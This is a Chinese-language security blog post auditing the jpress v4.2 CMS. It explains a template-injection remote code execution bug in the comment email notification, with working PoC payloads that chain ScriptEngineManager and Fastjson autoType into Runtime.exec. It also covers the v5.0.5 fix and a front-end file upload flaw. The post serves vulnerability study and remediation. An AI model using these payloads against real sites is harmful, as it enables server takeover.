聲明

出品|先知社區(qū)(ID:1871162774168111）

以下內(nèi)容，來自先知社區(qū)的1871162774168111作者原創(chuàng)，由于傳播，利用此文所提供的信息而造成的任何直接或間接的后果和損失，均由使用者本人負(fù)責(zé)，長白山攻防實(shí)驗(yàn)室以及文章作者不承擔(dān)任何責(zé)任。

0x01 前言

最近做CMS審計(jì)的時(shí)候恰好碰到了這么一個(gè)框架，學(xué)習(xí)漏洞不光是要會(huì)打，還要明白原理，結(jié)合網(wǎng)站可知；是用jpress V4.2搭建的，來學(xué)習(xí)一手。后面發(fā)現(xiàn)是就press3.0，我是小丑

jpress類似于WordPress Write in Java，和PHP的WordPress非常像。不過 Java搭建環(huán)境會(huì)比PHP要復(fù)雜一些，當(dāng)時(shí)我自己也是因?yàn)榄h(huán)境搭建的問題卡了很久(非常多的問題，不只是maven，這一塊踩坑的師傅可以滴滴我

比起普通的SpringBoot搭建的Java環(huán)境相比，jpress使用的jBoot，和 SpringBoot十分類似，不過看點(diǎn)其他架構(gòu)寫的項(xiàng)目也是比較有趣。

0x02 環(huán)境搭建

這個(gè)項(xiàng)目的環(huán)境搭建會(huì)有點(diǎn)煩躁

項(xiàng)目地址：

https://github.com/JPressProjects/jpress

去到release頁面下，下載v4.2版本的，后續(xù)會(huì)對(duì)新版本當(dāng)中的漏洞進(jìn)行挖掘。下載完畢項(xiàng)目之后，先在項(xiàng)目界面輸入命令

mvn clean package

此處比較坑，我遇到的問題是

Failed to execute goal org.apache.maven.plugins:maven-jar-plugin:2.4:jar (default-jar) on project codegen: Execution default-jar of goal org.apache.maven.plugins:maven-jar-plugin:2.4:jar failed: A required class was missing while executing org.apache.maven.plugins:maven-jar-plugin:2.4:jar: org/codehaus/plexus/components/io/resources/PlexusIoResourceCollection

將存儲(chǔ)maven倉庫的所有庫都刪掉即可，接著再執(zhí)行命令即可。

搭建完畢之后創(chuàng)建數(shù)據(jù)庫，但不要導(dǎo)入文件，也不要修改任何配置，直接跑項(xiàng)目。

項(xiàng)目跑起來之后會(huì)訪問到http://localhos-t:8080/install下

0x03 代碼審計(jì)

代碼審計(jì)準(zhǔn)備

架構(gòu)理解

jpress項(xiàng)目分為前臺(tái)頁面和后臺(tái)管理界面，前臺(tái)頁面是純前端的內(nèi)容，所以漏洞點(diǎn)主要是在后臺(tái)管理頁面這里。

在后臺(tái)管理界面這里，需要在模板--->所有模板中選擇對(duì)應(yīng)的模板，才能在前臺(tái)頁面看到一些漏洞的回顯。比如XXE，XSS這些，在公司測(cè)試的時(shí)候沒有注意到這一點(diǎn)，吃了些虧。

pom.xml與Filter等審計(jì)

查看父項(xiàng)目的pom.xml，發(fā)現(xiàn)用的都是最新版本的組件，理論上不存在組件漏洞。

此項(xiàng)目中不存在Filter，這就意味著很可能存在SQL注入或者是XSS

存在多module，需要我們對(duì)不同module功能塊進(jìn)行審計(jì)，盡量從一個(gè)漏洞發(fā)現(xiàn)者的角度去看，這樣還是可以學(xué)到很多的。

模板渲染引起的RCE

影響接口

/admin/article/setting/admin/page/setting/admin/product/setting/admin/template/edit

在setting目錄下存在好幾處的模板渲染漏洞

0x04 漏洞分析

為什么想到這個(gè)漏洞呢？原因是在文------>設(shè)置這里面的"評(píng)論郵件通知管理員"中；官方給出了例子，告訴我們可以用#(comment.id)，那么猜測(cè)這里可能會(huì)存在模板渲染問題，此處對(duì)應(yīng)的模板是Velocity

進(jìn)去看與文章評(píng)論相關(guān)的類，找到是這一個(gè)——io.jpress.module.article.controller.front.ArticleController，這里是有關(guān)于前臺(tái)頁面當(dāng)中，對(duì)于文章的管理的一個(gè)類。我們?cè)趐ostComment()方法處下一個(gè)斷點(diǎn)，這個(gè)方法的作用主要是將評(píng)論信息保存到數(shù)據(jù)庫，同時(shí)還會(huì)發(fā)送短信通知網(wǎng)站管理員。

接著發(fā)布一條評(píng)論，來看一看它的運(yùn)行流程。

前面是一系列的賦值與基礎(chǔ)判斷，有興趣的師傅們可以自行調(diào)試看一下，屬于是很簡單的部分。直接看重點(diǎn)部分，第268行。

eval:81, Method (com.jfinal.template.expr.ast)assignVariable:102, Assign (com.jfinal.template.expr.ast)eval:95, Assign (com.jfinal.template.expr.ast)exec:57, Set (com.jfinal.template.stat.ast)exec:68, StatList (com.jfinal.template.stat.ast)render:74, Template (com.jfinal.template)renderToString:91, Template (com.jfinal.template)doSendEmail:91, ArticleNotifyKit (io.jpress.module.article.kit)lambda$byEmail$16:70, ArticleNotifyKit (io.jpress.module.article.kit)run:-1, 1607068801 (io.jpress.module.article.kit.ArticleNotifyKit$$Lambda$79)runWorker:1142, ThreadPoolExecutor (java.util.concurrent)run:617, ThreadPoolExecutor$Worker (java.util.concurrent)run:745, Thread (java.lang)

此處就可以很明顯的看到存在反射調(diào)用任意類的命令執(zhí)行漏洞

在Velocity 中?"#"?用來標(biāo)識(shí)Velocity的腳本語句，包括#set、#if 、#else、#end、#foreach、#end、#iinclude、#parse、#macro等；如：

#if($info.imgs) <img src="$info.imgs" border=0> #else <img src="noPhoto.jpg"> #end在這一個(gè)PoC當(dāng)中，我們可以借助Fastjson的特性輔助攻擊。

構(gòu)造PoC如下，并將它插入到評(píng)論的內(nèi)容當(dāng)中。

#set(x=net.sf.ehcache.util.ClassLoaderUtil::createNewInstance("javax.script.ScriptEngineManager"))#set(e=x.getEngineByName("js"))#(e.eval('java.lang.Runtime.getRuntime().exec("calc")'))

#set(str=comment.content)#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) #(x.setAutoTypeSupport(true)) #set(sem=str.substring(0, str.indexOf(124)))#set(str=str.substring(str.indexOf(124)+1))#(x.addAccept(sem)) #set(json=str.substring(0, str.indexOf(124)))#set(str=str.substring(str.indexOf(124)+1))#set(x=com.alibaba.fastjson.JSON::parse(json))#set(js=str.substring(0, str.indexOf(124)))#set(str=str.substring(str.indexOf(124)+1))#set(e=x.getEngineByName(js)) #(e.eval(str))

因?yàn)楹蠖嗽阡秩灸０鍟r(shí)將comment對(duì)象傳入了，所以我們可以獲取 comment.content，而這個(gè)值又是在評(píng)論時(shí)可控的，配合Fastjson打。

在評(píng)論的地方構(gòu)造payload

javax.script.ScriptEngineManager|{"@type":"javax.script.ScriptEngineManager"}|js|java.lang.Runtime.getRuntime().exec("calc")

0x05漏洞修復(fù)

我認(rèn)為的修復(fù)方式會(huì)比較貼近Velocity的一些修復(fù)方式，而Velocity到目前最新版本也沒有提供沙盒或者防御方式，只能禁止或嚴(yán)格過濾用戶輸入進(jìn)入 Velocity.evaluate。但是這一框架是作者團(tuán)隊(duì)自己編寫的，并非Velocity

但是在這一個(gè)項(xiàng)目當(dāng)中，我們可以去看一下jpress V5.0.5的版本當(dāng)中是如何修復(fù)的，這個(gè)地方當(dāng)時(shí)自己找的時(shí)候花了很久時(shí)間。

jpress V5.0.5，也就是最新版本當(dāng)中，是通過轉(zhuǎn)義字符來修補(bǔ)這個(gè)漏洞的。挺妙的，代碼量小且利用效率高，很強(qiáng)。它的修補(bǔ)手段是在getPara()方法處先做一個(gè)轉(zhuǎn)義，具體代碼的調(diào)用棧如下

cleanXss:79, XSSHttpServletRequestWrapper (io.jboot.web.xss)getParameter:32, XSSHttpServletRequestWrapper (io.jboot.web.xss)getParameter:161, ServletRequestWrapper (javax.servlet)getPara:189, Controller (com.jfinal.core)postComment:148, ArticleController (io.jpress.module.article.controller.front)

0x06前臺(tái)任意文件上傳漏洞

影響接口/ucenter/avatar

漏洞影響域在/ucenter/avatar下，這里對(duì)應(yīng)的接口找了很久，最后終于找到是在

io.jpress.web.commons.controller.AttachmentController#upload處

漏洞分析

產(chǎn)生漏洞的根本原因是，Web應(yīng)用程序允許上傳一個(gè)file[]數(shù)組，而非單個(gè)文件，從而我們可以構(gòu)造多個(gè)文件同時(shí)上傳來繞過。

歡迎關(guān)注長白山攻防實(shí)驗(yàn)室微信公眾號(hào)

定期更新優(yōu)質(zhì)文章分享